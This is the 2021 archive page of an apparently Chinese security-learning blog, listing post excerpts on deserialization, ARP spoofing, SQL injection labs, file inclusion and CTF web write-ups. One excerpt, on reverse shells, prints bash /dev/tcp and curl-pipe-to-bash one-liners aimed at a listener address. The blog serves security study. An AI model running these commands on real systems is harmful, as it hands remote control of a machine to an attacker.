年份:2021年

47 篇文章

java序列化与反序列学习(一)
什么是序列化与反序列化? Java序列化是指把Java对象转换为字节序列的过程 而Java反序列化是指把字节序列恢复为Java对象的过程。 序列化分为两大部分: 序列化和反序列化。 序列化是这个过程的第一部分,将数据分解成字节流,以便存储在文件中或在网络上传输。 反序列化就是打开字节流并重构对象。对象序列化不仅要将基本数据类型转换成字节表示,有时还…
arp欺骗攻击及其原理
前置知识 Arp协议 arp(英语:Address Resolution Protocol,缩写:ARP)是一个通过解析网络层地址来找寻数据链路层地址的网络传输协议,它在IPv4中极其重要。ARP最初在1982年的RFC 826(征求意见稿)[1]中提出并纳入互联网标准STD 37。ARP也可能指是在多数操作系统中管理其相关地址的一个进程。…
GKCTF2021 web复现
babycat 看源码可以看到有注册,但是点击却不行 尝试直接构造发包,注册成功 登陆进来发现只有Download Test可以点,Upload需要admin权限 Download Test可以直接下载源码 可以看到注册的代码里会匹配role,这里for循环的意思是对最后一个匹配的进行强制替换,题目还提示了注释符,这里使用的是gson解析,可以使用…
靶场之SQlilabs
Less-1 首先查看源码可以看到注入为字符型 if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id…
2021祥云杯部分web复现
Package Manager 考察:sql注入 给出了源码,可以找到注入点,这里可以绕过token 尝试闭合202cb962ac59075b964b07152d234b70"||this.username=="admin 直接跳转到了/packages/submit,可以注入, 直接跑密码 import requests import strin…
PHP文件包含
相关函数 php中引发文件包含漏洞的通常是以下四个函数: - include() - include_once() - require() - require_once() reuqire() 如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。 include() 如果出错的话,只会提出警告,会继续执行后续语句。 requir…
靶机Chronos渗透
涉及攻击方法: 端口扫描 WEB侦查 命令注入 数据编解码 搜索大法 框架漏洞利用 代码审计 NC串联 本地提权 使用的工具 netdiscover nmap burpsuit CyberChef 部署好靶机,我使用的桥接方式 渗透 使用netdiscover扫描192.168.0.0/16,可以看到靶机ip是192.168.0.134 使用nma…
php反序列化
PHP反序列化链 PoP链的核心,就是魔术方法。而php的魔术方法中涉及到反序列化的大致有以下几种: __destruct: 析构函数,会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行。一般来说,也是Pop链的入口。 __toString: 类对象遇到字符串操作时触发。 __wakeup: 类实例反序列化时触发。 __call: 当调用了…
各种花式弹shell
Linux反弹shell bash bash -i >& /dev/tcp/192.168.0.135/4444 0>&1 curl curl 192.168.0.135/shell | bash shell文件内容 bash -i >& /dev/tcp/192.168.0.135/4444 0>&…
【CyBRICS 2021】Ad Network
解题 这是个无限套娃题 题目提示重定向到深处 进首页什么也没发现,看源码发现有层目录/adnetwork 直接访问发现一直进不去,分析下网络,一直在重定向,直接抓包 发现可以获取到重定向链接,直接用脚本跑 import requests import re # 保持网站会话 s = requests.Session() # 发送get请求 url …